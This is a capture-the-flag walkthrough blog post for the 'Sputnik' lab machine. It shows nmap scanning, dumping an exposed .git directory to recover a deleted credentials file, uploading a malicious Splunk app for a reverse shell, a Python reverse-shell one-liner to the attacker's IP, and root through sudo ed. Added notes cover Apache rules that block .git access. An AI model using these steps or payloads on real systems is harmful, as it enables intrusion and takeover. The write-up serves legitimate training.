Sputnik_1 box

Information gathering

┌──(kali㉿kali)-[~]
└─$ sudo nmap --min-rate 10000 -p- 192.168.56.130
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-18 08:40 EDT
Nmap scan report for 192.168.56.130
Host is up (0.00034s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE
8089/tcp open unknown
55555/tcp open unknown
61337/tcp open unknown
MAC Address: 08:00:27:D8:0B:51 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 9.45 seconds
┌──(kali㉿kali)-[~/Downloads/Sputnik]
└─$ sudo nmap --top-ports 20 -sU 192.168.56.130
[sudo] password for kali:
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-18 09:47 EDT
Nmap scan report for 192.168.56.130
Host is up (0.0011s latency).

PORT STATE SERVICE
53/udp closed domain
67/udp closed dhcps
68/udp open|filtered dhcpc
69/udp closed tftp
123/udp closed ntp
135/udp closed msrpc
137/udp closed netbios-ns
138/udp closed netbios-dgm
139/udp closed netbios-ssn
161/udp closed snmp
162/udp closed snmptrap
445/udp closed microsoft-ds
500/udp closed isakmp
514/udp closed syslog
520/udp closed route
631/udp closed ipp
1434/udp closed ms-sql-m
1900/udp closed upnp
4500/udp closed nat-t-ike
49152/udp closed unknown
MAC Address: 08:00:27:D8:0B:51 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 24.37 seconds

Three uncommon TCP ports are open.

┌──(kali㉿kali)-[~]
└─$ sudo nmap -sT -sV -sC -O -p8089,55555,61337 192.168.56.130
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-18 08:41 EDT
Nmap scan report for 192.168.56.130
Host is up (0.00055s latency).

PORT STATE SERVICE VERSION
8089/tcp open ssl/http Splunkd httpd
|_http-server-header: Splunkd
|_http-title: splunkd
| ssl-cert: Subject: commonName=SplunkServerDefaultCert/organizationName=SplunkUser
| Not valid before: 2019-03-29T11:03:21
|_Not valid after: 2022-03-28T11:03:21
| http-robots.txt: 1 disallowed entry
|_/
55555/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Flappy Bird Game
|_http-server-header: Apache/2.4.29 (Ubuntu)
| http-git:
| 192.168.56.130:55555/.git/
| Git repository found!
|_ Repository description: Unnamed repository; edit this file 'description' to name the...
61337/tcp open http Splunkd httpd
|_http-server-header: Splunkd
| http-title: Site doesn\'t have a title (text/html; charset=UTF-8).
|_Requested resource was http://192.168.56.130:61337/en-US/account/login?return_to=%2Fen-US%2F
| http-robots.txt: 1 disallowed entry
|_/
MAC Address: 08:00:27:D8:0B:51 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 37.70 seconds

Every port serves a web application, and port 55555 exposes a .git directory.

┌──(kali㉿kali)-[~]
└─$ sudo nmap --script=vuln -p8089,55555,61337 192.168.56.130
[sudo] password for kali:
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-18 08:59 EDT
Nmap scan report for 192.168.56.130
Host is up (0.00075s latency).

PORT STATE SERVICE
8089/tcp open unknown
55555/tcp open unknown
61337/tcp open unknown
MAC Address: 08:00:27:D8:0B:51 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 45.10 seconds

The vuln script scan returned nothing.
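The .git directory found on port 55555 is served by Apache 2.4.29 as ordinary static files. As an added, defender-side example that is not part of the original post, here is that exposure beside the configuration that closes it; the DocumentRoot path is an assumption.

```apache
# Exposed (the situation on port 55555): the web root is a git checkout and
# nothing stops Apache from serving its metadata, so /.git/HEAD, /.git/index
# and /.git/objects/xx/... are all readable.  DocumentRoot path is assumed.
<Directory "/var/www/flappy">
    Options -Indexes
    Require all granted
</Directory>

# Fixed: deny every directory named .git (or other VCS metadata) wherever it
# sits under the filesystem; the regex matches "/.git/" anywhere in the path
# or "/.git" at its end, so objects/ and refs/ subdirectories are covered too.
<DirectoryMatch "/\.(git|svn|hg)(/|$)">
    Require all denied
</DirectoryMatch>

# Top-level dotfiles (.gitignore and .gitattributes show up in the dump below)
# are files, not directories, so they need a FilesMatch rule as well.
<FilesMatch "^\.">
    Require all denied
</FilesMatch>

# mod_alias alternative: answer 404 for any URL containing /.git, which also
# avoids confirming the directory's existence with a 403.
RedirectMatch 404 "/\.git"
```

After a reload, a request for /.git/HEAD should get 403 (or 404 with the RedirectMatch variant) instead of the `ref: refs/heads/master` line that a dumping tool relies on.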

.git disclosure

A quick look at each web interface: port 55555 hosts a small game, and 8089 is the Splunkd management interface, but its services and servicesNS endpoints both require a login; 61337 also requires a login and looks like the real back-end login page.

Attention now turns to the .git directory.

Download it locally with a tool for inspection:

┌──(kali㉿kali)-[~/Downloads/Sputnik/GitTools/Dumper]
└─$ ./gitdumper.sh http://192.168.56.130:55555/.git/ clone
###########
# GitDumper is part of https://github.com/internetwache/GitTools
#
# Developed and maintained by @gehaxelt from @internetwache
#
# Use at your own risk. Usage might be illegal in certain circumstances.
# Only for educational purposes!
###########


[*] Destination folder does not exist
[+] Creating clone/.git/
[+] Downloaded: HEAD
[-] Downloaded: objects/info/packs
[+] Downloaded: description
[-] Downloaded: config
[-] Downloaded: COMMIT_EDITMSG
[+] Downloaded: index
[+] Downloaded: packed-refs
[+] Downloaded: refs/heads/master
[+] Downloaded: refs/remotes/origin/HEAD
[-] Downloaded: refs/stash
[+] Downloaded: logs/HEAD
[+] Downloaded: logs/refs/heads/master
[+] Downloaded: logs/refs/remotes/origin/HEAD
[-] Downloaded: info/refs
[+] Downloaded: info/exclude
[-] Downloaded: /refs/wip/index/refs/heads/master
[-] Downloaded: /refs/wip/wtree/refs/heads/master
[+] Downloaded: objects/89/9212a811519dd29ee550e163f40560f15107ff
[+] Downloaded: objects/21/b4eb398bdae0799afbbb528468b5c6f580b975
[-] Downloaded: objects/00/00000000000000000000000000000000000000
[+] Downloaded: objects/dd/b976cde6367cc38a83709b34940c20071c028f
[+] Downloaded: objects/20/395ca0a240b85c4289e06ea59f4cf19d4a7bd6
[+] Downloaded: objects/b4/35a10303be16fe1af8f6c8640f4b9121d3b00e
[+] Downloaded: objects/2b/5f6a83f073daba038f700ead56834c3795f3c2
[+] Downloaded: objects/bd/b0cabc87cf50106df6e15097dff816c8c3eb34
[+] Downloaded: objects/cd/2946ad76b4402e5b3cab9243a9281aad228670
[+] Downloaded: objects/b7/c6a79fd534ed19ab1708ac7a754ca1db28b951
[+] Downloaded: objects/df/45033222b87c64965dce38263e6d5948fb5ec1
[+] Downloaded: objects/ad/295422122860df7d9a4ef0c74de1e6deb67050
[+] Downloaded: objects/4e/007610d905bd04d2779c5eed42baf4882da8d9
[+] Downloaded: objects/8f/260dadbe40cdc656eb43c0c24401bdd4255bd0
[+] Downloaded: objects/ae/d22cd9ee281b5ea70ba1d23b03c4ecb5277581
[+] Downloaded: objects/d3/441572c46f5df5fee247527c91036a000502cd
[+] Downloaded: objects/80/a878bb7c7c26551037e6af8333f1ad331a7fd6
[+] Downloaded: objects/0d/afaf31ba3bc76844127b417191be59d320d705
[+] Downloaded: objects/06/f56474f3bf500c539c738d6bb7093823594d85
[+] Downloaded: objects/b3/8d4f0e65b0bc7044792da436da5d763dc1acd1
[+] Downloaded: objects/6f/749e77927895771fc0c67d2049be7f7ffeb7c0
[+] Downloaded: objects/07/fda135aae22fa7869b3de9e450ff7cacfbc717
[+] Downloaded: objects/ea/cc72595ded7dd95db6045e7d34c989c2b9fc8f
[+] Downloaded: objects/14/9ecc70a312bb6c2e184d9106adb1ab0b91fa49
[+] Downloaded: objects/25/41266769d9ea409ad2e84fce3dd0267ed89a04
[-] Downloaded: objects/f4/385198ce1cab56e0b2a1c55e8863040045b085
[+] Downloaded: objects/99/e27515fca6dcbb65c9146ea4ec08ff86a0d3e0
[+] Downloaded: objects/30/db67474fc60907100c33130930c6a686854f1f
[+] Downloaded: objects/04/5511e6166a080522fea6d3dcb49899d30a9b03
[+] Downloaded: objects/75/c741fdd3e600a3cdf11414beb0c9dab8646466
[+] Downloaded: objects/27/fd90cc337d599e4d93d6ceeced4664426243df
[+] Downloaded: objects/8b/8be7119c795b91424aa237bc91e058a0bffa15
[+] Downloaded: objects/cf/40c32b4b3e714d4616f8721ec54f6f446181a7
[+] Downloaded: objects/31/9b43a0731b8e8278bcb7c2c16f9008cf45c822

Then switch into that directory and have a look. Start with git log (it lists every commit up to the one HEAD points to):

┌──(kali㉿kali)-[~/…/Sputnik/GitTools/Dumper/clone]
└─$ git log
commit 21b4eb398bdae0799afbbb528468b5c6f580b975 (HEAD -> master, origin/master, origin/HEAD)
Author: Ameer Pornillos <44928938+ameerpornillos@users.noreply.github.com>
Date: Fri Mar 29 21:02:22 2019 +0800

Update index.html

commit 2b5f6a83f073daba038f700ead56834c3795f3c2
Author: Ameer Pornillos <44928938+ameerpornillos@users.noreply.github.com>
Date: Fri Mar 29 20:30:41 2019 +0800

Update sprite.js

commit 0dafaf31ba3bc76844127b417191be59d320d705
Author: Ameer Pornillos <44928938+ameerpornillos@users.noreply.github.com>
Date: Fri Mar 29 20:28:58 2019 +0800

Delete new file

commit b38d4f0e65b0bc7044792da436da5d763dc1acd1
Author: Ameer Pornillos <44928938+ameerpornillos@users.noreply.github.com>
Date: Fri Mar 29 20:28:15 2019 +0800

Update new file

commit 07fda135aae22fa7869b3de9e450ff7cacfbc717
Author: Ameer Pornillos <44928938+ameerpornillos@users.noreply.github.com>
Date: Fri Mar 29 20:27:01 2019 +0800

Commit new file

commit 2541266769d9ea409ad2e84fce3dd0267ed89a04
Author: Ameer Pornillos <44928938+ameerpornillos@users.noreply.github.com>
Date: Fri Mar 29 20:05:22 2019 +0800

Update README.md

commit 99e27515fca6dcbb65c9146ea4ec08ff86a0d3e0
Author: richagithub <richa09me@gmail.com>
Date: Mon Aug 14 20:35:42 2017 +0530

Update README.md

commit 045511e6166a080522fea6d3dcb49899d30a9b03
Author: richagithub <richa09me@gmail.com>
Date: Wed Apr 13 12:49:26 2016 +0530

first commit

completed on pc

commit 27fd90cc337d599e4d93d6ceeced4664426243df
Author: richagithub <richa09me@gmail.com>
Date: Wed Apr 13 12:48:25 2016 +0530

:space_invader: Added .gitattributes & .gitignore files

commit cf40c32b4b3e714d4616f8721ec54f6f446181a7
Author: richagithub <richa09me@gmail.com>
Date: Wed Apr 13 14:05:09 2016 +0530

Initial commit

Adding the --raw parameter gives fuller information: git log --raw is more detailed and lists, for every commit, each file that was modified together with the specifics of the change.

┌──(kali㉿kali)-[~/…/Sputnik/GitTools/Dumper/clone]
└─$ git log --raw
commit 21b4eb398bdae0799afbbb528468b5c6f580b975 (HEAD -> master, origin/master, origin/HEAD)
Author: Ameer Pornillos <44928938+ameerpornillos@users.noreply.github.com>
Date: Fri Mar 29 21:02:22 2019 +0800

Update index.html

:100644 100644 b7c6a79 aed22cd M index.html

commit 2b5f6a83f073daba038f700ead56834c3795f3c2
Author: Ameer Pornillos <44928938+ameerpornillos@users.noreply.github.com>
Date: Fri Mar 29 20:30:41 2019 +0800

Update sprite.js

:100644 100644 ad29542 d344157 M sprite.js

commit 0dafaf31ba3bc76844127b417191be59d320d705
Author: Ameer Pornillos <44928938+ameerpornillos@users.noreply.github.com>
Date: Fri Mar 29 20:28:58 2019 +0800

Delete new file

:100644 000000 eacc725 0000000 D secret

commit b38d4f0e65b0bc7044792da436da5d763dc1acd1
Author: Ameer Pornillos <44928938+ameerpornillos@users.noreply.github.com>
Date: Fri Mar 29 20:28:15 2019 +0800

Update new file

:100644 100644 f438519 eacc725 M secret

commit 07fda135aae22fa7869b3de9e450ff7cacfbc717
Author: Ameer Pornillos <44928938+ameerpornillos@users.noreply.github.com>
Date: Fri Mar 29 20:27:01 2019 +0800

Commit new file

:000000 100644 0000000 f438519 A secret

commit 2541266769d9ea409ad2e84fce3dd0267ed89a04
Author: Ameer Pornillos <44928938+ameerpornillos@users.noreply.github.com>
Date: Fri Mar 29 20:05:22 2019 +0800

Update README.md

:100644 100644 75c741f 8f260da M README.md

commit 99e27515fca6dcbb65c9146ea4ec08ff86a0d3e0
Author: richagithub <richa09me@gmail.com>
Date: Mon Aug 14 20:35:42 2017 +0530

Update README.md

:100644 100644 8f260da 75c741f M README.md

commit 045511e6166a080522fea6d3dcb49899d30a9b03
Author: richagithub <richa09me@gmail.com>
Date: Wed Apr 13 12:49:26 2016 +0530

first commit

completed on pc

:000000 100644 0000000 b7c6a79 A index.html
:000000 100644 0000000 df45033 A sheet.png
:000000 100644 0000000 ad29542 A sprite.js

commit 27fd90cc337d599e4d93d6ceeced4664426243df
Author: richagithub <richa09me@gmail.com>
Date: Wed Apr 13 12:48:25 2016 +0530

:space_invader: Added .gitattributes & .gitignore files

:000000 100644 0000000 bdb0cab A .gitattributes
:000000 100644 0000000 cd2946a A .gitignore

commit cf40c32b4b3e714d4616f8721ec54f6f446181a7
Author: richagithub <richa09me@gmail.com>
Date: Wed Apr 13 14:05:09 2016 +0530

Initial commit

:000000 100644 0000000 8f260da A README.md

With --raw we can see that secret was created and then deleted. Try git checkout <commit id> to reset the working tree and index to that commit's contents.

┌──(kali㉿kali)-[~/…/GitTools/Dumper/clone/_sheet.png.extracted]
└─$ git checkout 07fda135aae22fa7869b3de9e450ff7cacfbc717
error: unable to read sha1 file of secret (f4385198ce1cab56e0b2a1c55e8863040045b085)
error: invalid object 100644 f4385198ce1cab56e0b2a1c55e8863040045b085 for 'secret'
D secret
Note: switching to '07fda135aae22fa7869b3de9e450ff7cacfbc717'.

You are in 'detached HEAD' state. You can look around, make experimental
changes and commit them, and you can discard any commits you make in this
state without impacting any branches by switching back to a branch.

If you want to create a new branch to retain commits you create, you may
do so (now or later) by using -c with the switch command. Example:

git switch -c <new-branch-name>

Or undo this operation with:

git switch -

Turn off this advice by setting config variable advice.detachedHead to false

HEAD is now at 07fda13 Commit new file

An error appears.

The object file must be damaged (in the GitDumper output above, objects/f4/385198ce1cab56e0b2a1c55e8863040045b085 is marked [-], i.e. it was not retrieved). Looking back through git log, it contains a username and an email address, as well as a git user email: Ameer Pornillos <44928938+ameerpornillos@users.noreply.github.com>

GitHub disclosure

Search GitHub for that user and look at their repositories.

Clone the repository locally:

┌──(kali㉿kali)-[~/Downloads/Sputnik]
└─$ git clone https://github.com/ameerpornillos/flappy.git
Cloning into 'flappy'...
remote: Enumerating objects: 65, done.
remote: Total 65 (delta 0), reused 0 (delta 0), pack-reused 65
Receiving objects: 100% (65/65), 31.52 KiB | 424.00 KiB/s, done.
Resolving deltas: 100% (22/22), done.
┌──(kali㉿kali)-[~/Downloads/Sputnik/flappy]
└─$ git checkout 07fda135aae22fa7869b3de9e450ff7cacfbc717
Note: switching to '07fda135aae22fa7869b3de9e450ff7cacfbc717'.

You are in 'detached HEAD' state. You can look around, make experimental
changes and commit them, and you can discard any commits you make in this
state without impacting any branches by switching back to a branch.

If you want to create a new branch to retain commits you create, you may
do so (now or later) by using -c with the switch command. Example:

git switch -c <new-branch-name>

Or undo this operation with:

git switch -

Turn off this advice by setting config variable advice.detachedHead to false

HEAD is now at 07fda13 Commit new file


┌──(kali㉿kali)-[~/Downloads/Sputnik/flappy]
└─$ ls -liah
total 52K
1183470 drwxr-xr-x 3 kali kali 4.0K Jul 18 11:04 .
1183326 drwxr-xr-x 5 kali kali 4.0K Jul 18 11:04 ..
1183471 drwxr-xr-x 8 kali kali 4.0K Jul 18 11:04 .git
1183785 -rw-r--r-- 1 kali kali 378 Jul 18 11:04 .gitattributes
1183800 -rw-r--r-- 1 kali kali 649 Jul 18 11:04 .gitignore
1183802 -rw-r--r-- 1 kali kali 7.5K Jul 18 11:04 index.html
1183801 -rw-r--r-- 1 kali kali 26 Jul 18 11:04 README.md
1183806 -rw-r--r-- 1 kali kali 42 Jul 18 11:04 secret
1183803 -rw-r--r-- 1 kali kali 12K Jul 18 11:04 sheet.png
1183804 -rw-r--r-- 1 kali kali 2.1K Jul 18 11:04 sprite.js


┌──(kali㉿kali)-[~/Downloads/Sputnik/flappy]
└─$ cat secret
sputnik:ameer_says_thank_you_and_good_job

We now have a username and password; try logging in on port 61337.

Splunk back-end: getting a shell

How to get a shell from the back-end still comes down to searching.

The first blog post found mentions an open-source GitHub tool, https://github.com/TBGSecurity/splunk_shells; download it locally and then upload it through the back-end.

Click Manage Apps.

Upload the malicious app.

Splunk then prompts for a restart. After logging in again, go back to Manage Apps, find the uploaded app "Weaponize Splunk for Pentesting and Red Teaming" and click Permissions.

Grant the permissions shown above, start a listener beforehand, then run the following in the Search view to get a reverse shell: | revshell std IP Port

On the other side the reverse shell comes in:

┌──(kali㉿kali)-[~]
└─$ sudo nc -lvnp 443
[sudo] password for kali:
listening on [any] 443 ...
connect to [192.168.56.106] from (UNKNOWN) [192.168.56.130] 56982
whoami
splunk
id
uid=1001(splunk) gid=1001(splunk) groups=1001(splunk)
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: enp0s17: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
link/ether 08:00:27:d8:0b:51 brd ff:ff:ff:ff:ff:ff
inet 192.168.56.130/24 brd 192.168.56.255 scope global dynamic enp0s17
valid_lft 553sec preferred_lft 553sec
inet6 fe80::a00:27ff:fed8:b51/64 scope link
valid_lft forever preferred_lft forever
uname -a
Linux sputnik 4.15.0-46-generic #49-Ubuntu SMP Wed Feb 6 09:33:07 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
which python
/opt/splunk/bin/python
python -c "import pty;pty.spawn('/bin/bash')"

whoami
^C

The first reverse shell was unreliable and upgrading it to an interactive one failed, but since Python is available we can simply send back another shell:

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.56.106",444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'
┌──(kali㉿kali)-[~]
└─$ sudo nc -lvnp 444
[sudo] password for kali:
listening on [any] 444 ...
connect to [192.168.56.106] from (UNKNOWN) [192.168.56.130] 52604
splunk@sputnik:/$ whoami
whoami
splunk
splunk@sputnik:/$ id
id
uid=1001(splunk) gid=1001(splunk) groups=1001(splunk)
splunk@sputnik:/$ uname -a
uname -a
Linux sputnik 4.15.0-46-generic #49-Ubuntu SMP Wed Feb 6 09:33:07 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
splunk@sputnik:/$ ip a
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: enp0s17: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
link/ether 08:00:27:d8:0b:51 brd ff:ff:ff:ff:ff:ff
inet 192.168.56.130/24 brd 192.168.56.255 scope global dynamic enp0s17
valid_lft 600sec preferred_lft 600sec
inet6 fe80::a00:27ff:fed8:b51/64 scope link
valid_lft forever preferred_lft forever

Privilege escalation

Success. Next, check the sudo -l permissions:

splunk@sputnik:/$ sudo -l
sudo -l
[sudo] password for splunk: ameer_says_thank_you_and_good_job

Matching Defaults entries for splunk on sputnik:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User splunk may run the following commands on sputnik:
(root) /bin/ed

ed can be run as root directly, so escalation is simple; a GTFOBins lookup gives:

sudo /bin/ed
!/bin/bash

Root obtained:

splunk@sputnik:/$ sudo /bin/ed
sudo /bin/ed
!/bin/bash
!/bin/bash
root@sputnik:/# cd /root
cd /root
root@sputnik:~# ls -alih
ls -alih
total 28K
131074 drwx------ 4 root root 4.0K Mar 29 2019 .
2 drwxr-xr-x 23 root root 4.0K Mar 29 2019 ..
131075 -rw-r--r-- 1 root root 3.1K Apr 9 2018 .bashrc
131077 -r-------- 1 root root 1.7K Mar 29 2019 flag.txt
273731 drwxr-xr-x 3 root root 4.0K Mar 29 2019 .local
131076 -rw-r--r-- 1 root root 148 Aug 17 2015 .profile
269461 drwx------ 2 root root 4.0K Mar 29 2019 .ssh
root@sputnik:~# cat flag.txt
cat flag.txt
_________________________________________
/ Congratulations! \
| |
| You did it! |
| |
| Thank you for trying out this challenge |
| and hope that you learn a thing or two. |
| |
| Check the flag below. |
| |
| flag_is{w1th_gr34t_p0w3r_c0m35_w1th_gr3 |
| 4t_r3sp0ns1b1l1ty} |
| |
| Hope you enjoy solving this challenge. |
| :D |
| |
\ - ameer (from hackstreetboys) /
-----------------------------------------
\ / \ //\
\ |\___/| / \// \\
/0 0 \__ / // | \ \
/ / \/_/ // | \ \
@_^_@'/ \/_ // | \ \
//_^_/ \/_ // | \ \
( //) | \/// | \ \
( / /) _|_ / ) // | \ _\
( // /) '/,_ _ _/ ( ; -. | _ _\.-~ .-~~~^-.
(( / / )) ,-{ _ `-.|.-~-. .~ `.
(( // / )) '/\ / ~-. _ .-~ .-~^-. \
(( /// )) `. { } / \ \
(( / )) .----~-.\ \-' .~ \ `. \^-.
///.----..> \ _ -~ `. ^-` ^-_
///-._ _ _ _ _ _ _}^ - - - - ~ ~-- ,.-~
/.-~

Summary

A fairly easy machine. It mainly tests .git disclosure and information gathering; the privilege escalation is routine. It also showed me that I am not that familiar with git and only have a hazy idea of how it works.

Supplement

Git notes

Adapted from Git 原理入门 (an introduction to Git internals) - 阮一峰的网络日志 (ruanyifeng.com)

  • Initialise: git init creates a .git subdirectory in the project root to hold version information.
    • git config --list # show the current Git configuration
  • Add a file to the Git store: git hash-object -w filename
    • The content is compressed into a binary file and stored in Git under the .git/objects directory.
    • The SHA1 hash of the current content is computed (a 40-character string).
    • The new Git object file is named after that hash: the first two characters form the directory name and the remaining 38 form the file name.
    • To see the original text behind such a binary file, use git cat-file.
  • Staging area (index, stage)
    • git update-index records a changed file in the staging area.
    • git update-index --add --cacheinfo 100644 <sha1> <path> adds a new file to the Git index or updates an existing entry. 100644 is the file mode, here a regular file.
    • git status produces more readable output.
  • Both steps in one (save the object and update the staging area): git add
    • git add --all performs those two steps for every changed file in the project.
    • The changes are written to .git/index.
  • commit: this amounts to taking a snapshot of the project; a Git project can be restored to any snapshot.
    • Every commit records who made it, so configure a user name and email:
    • git config user.name "user name"
    • git config user.email "email address"
  • Generate the tree object and the commit message
    • git write-tree turns the current directory structure into a Git object.
    • git commit-tree writes that tree object into the version history together with a message (echo "first commit" | git commit-tree <tree object>), producing a commit object.
    • git log --stat <commit object> shows the version history.
  • branch: the snapshot has been committed, but nothing yet records which branch it belongs to.
    • Git has a special pointer, HEAD, which always points to the latest snapshot of the current branch; HEAD~6 is the sixth snapshot before HEAD.
    • Every branch pointer is a text file stored under .git/refs/heads/.
  • git commit does all of this in one step: git commit -m "first commit"
    • The current branch pointer moves to the newly created snapshot.
    • git checkout <git object> switches to a given snapshot.
    • git show <git object> displays every code change in a snapshot.
  • Commands that rewrite the branch pointer automatically
    • git commit: the current branch pointer moves to the newly created snapshot.
    • git pull: after the current branch is merged with the remote branch, the pointer moves to the newly created snapshot.
    • git reset [commit_sha]: the current branch pointer is reset to the given snapshot.

Common Git command cheat sheet - 阮一峰的网络日志 (ruanyifeng.com)

# Replace the previous commit with a new one
# If there are no code changes, this rewrites the previous commit's message
$ git commit --amend -m [message]

# List all local branches
$ git branch

# Switch to the previous branch
$ git checkout -

# Merge the given branch into the current branch
$ git merge [branch]

# Create a new branch and switch to it
$ git checkout -b [branch]

# Delete a branch
$ git branch -d [branch-name]

# Show the differences between two commits
$ git diff [first-branch]...[second-branch]

# Fetch changes from the remote repository and merge them into the local branch
$ git pull [remote] [branch]

# Force-push the current branch to the remote repository, even if there are conflicts
$ git push [remote] --force

# Push all branches to the remote repository
$ git push [remote] --all

.git disclosure: how the exploitation works

Layout of the .git directory

Only the key directories and files needed to restore a repository are listed here:

HEAD — current branch pointer, normally pointing at a branch under refs/heads/
├── index — map of the project files in the current branch
├── logs — log directory
│   └── HEAD — log records
├── objects — project object directory
│   ├── info — pack file pointers (usually on the client side)
│   └── pack — pack file directory
└── refs — branch and tag directory
    ├── heads — pointers for each branch
    └── stash — stash file
Object: in git, stored data is saved under the .git/objects directory, zlib-compressed, with the file name derived from the SHA1 hash of the content.

Blob (data object): the form in which a source file's content is represented in git.

Tree object: akin to a directory map, pointing at blobs and at other tree objects.

Commit object: points at a tree object and records the commit author and the parent commits.

Tag object: points at a commit object and carries some extra data.

Reference: points at a single object, usually a commit or a tag; stored under the .git/refs/ directory.

The simplest commit flow:

  • git add . adds a new blob object under objects/ and records the blob's location in the index file.
  • git commit adds a tree object and a commit object under objects/; the pointer chain is refs/heads/master -> commit object -> tree object -> blob object.
  • The index file is updated.
  • A log entry is written; it contains the commit object.
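The object layout described in the two supplements above (hash-object and cat-file, objects/xx/yyyy naming, blob -> tree -> commit -> ref) worked through in Python, as an added example that is not part of the original post: it writes and reads loose objects, walks commit parents the way git log --raw does, and flags a blob that is absent from objects/, which is the "unable to read sha1 file" failure hit during the checkout earlier. The repository it builds is constructed in a temporary directory; its file names, contents and author are placeholders.

```python
import hashlib
import os
import tempfile
import zlib

def write_object(git_dir, kind, payload):
    """Like `git hash-object -w`: '<kind> <size>\\0' + payload, SHA-1 named, zlib-compressed."""
    raw = b"%s %d\0" % (kind.encode(), len(payload)) + payload
    sha = hashlib.sha1(raw).hexdigest()
    path = os.path.join(git_dir, "objects", sha[:2], sha[2:])  # 2 hex chars dir, 38 file name
    os.makedirs(os.path.dirname(path), exist_ok=True)
    with open(path, "wb") as f:
        f.write(zlib.compress(raw))
    return sha

def read_object(git_dir, sha):
    """Like `git cat-file`, but rejects an object whose bytes do not hash to its name."""
    with open(os.path.join(git_dir, "objects", sha[:2], sha[2:]), "rb") as f:
        raw = zlib.decompress(f.read())
    if hashlib.sha1(raw).hexdigest() != sha:
        raise ValueError("object %s does not match its hash" % sha)
    header, _, payload = raw.partition(b"\0")
    return header.split()[0].decode(), payload

def make_tree(files):
    """Flat tree object: '100644 <name>\\0' + 20 raw SHA-1 bytes per entry, sorted by name."""
    return b"".join(b"100644 %s\0" % n.encode() + bytes.fromhex(s) for n, s in sorted(files.items()))

def parse_tree(payload):
    entries, i = {}, 0  # inverse of make_tree: {name: blob sha}
    while i < len(payload):
        j = payload.index(b"\0", i)
        entries[payload[i:j].decode().split(" ", 1)[1]] = payload[j + 1:j + 21].hex()
        i = j + 21
    return entries

def log_with_files(git_dir, ref="refs/heads/master"):
    """Follow parent links from a ref like `git log --raw`; each tree entry is 'ok' or 'missing'."""
    with open(os.path.join(git_dir, ref)) as f:
        sha = f.read().strip()
    history = []
    while sha:
        # commit = header lines (tree, parent, author, committer), blank line, message
        head, _, message = read_object(git_dir, sha)[1].partition(b"\n\n")
        fields = dict(line.split(" ", 1) for line in head.decode().splitlines())
        files = {}
        for name, blob in parse_tree(read_object(git_dir, fields["tree"])[1]).items():
            try:
                read_object(git_dir, blob)
                files[name] = "ok"
            except (OSError, ValueError, zlib.error):
                files[name] = "missing"  # the post's 'unable to read sha1 file' case
        history.append((sha[:7], message.decode().strip(), files))
        sha = fields.get("parent")
    return history

def build_demo_repo(drop_secret_blob=True):
    """Constructed sample (not the post's repo): commit 1 adds README.md and secret, commit 2
    deletes secret; optionally the secret blob is removed, like the object GitDumper missed."""
    git_dir = tempfile.mkdtemp()
    ident = b"author A <a@example> 0 +0000\ncommitter A <a@example> 0 +0000\n"
    readme = write_object(git_dir, "blob", b"flappy\n")
    secret = write_object(git_dir, "blob", b"user:placeholder_password\n")
    tree1 = write_object(git_dir, "tree", make_tree({"README.md": readme, "secret": secret}))
    c1 = write_object(git_dir, "commit", b"tree %s\n%s\nCommit new file\n" % (tree1.encode(), ident))
    tree2 = write_object(git_dir, "tree", make_tree({"README.md": readme}))
    c2 = write_object(git_dir, "commit",
                      b"tree %s\nparent %s\n%s\nDelete new file\n" % (tree2.encode(), c1.encode(), ident))
    os.makedirs(os.path.join(git_dir, "refs", "heads"), exist_ok=True)
    with open(os.path.join(git_dir, "refs", "heads", "master"), "w") as f:
        f.write(c2 + "\n")
    if drop_secret_blob:
        os.remove(os.path.join(git_dir, "objects", secret[:2], secret[2:]))
    return git_dir, c1, c2
```

Running log_with_files on a dumped .git before any checkout tells you which blobs the dump actually contains, which is the check that would have predicted the checkout error above.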

Reference: 从git原理角度浅谈.git泄露利用原理 (a look at .git disclosure from the angle of Git internals) - 安全客 (anquanke.com)


https://i3eg1nner.github.io/2023/07/b1e4b39f91d9.html
Author: I3eg1nner
Published: 19 July 2023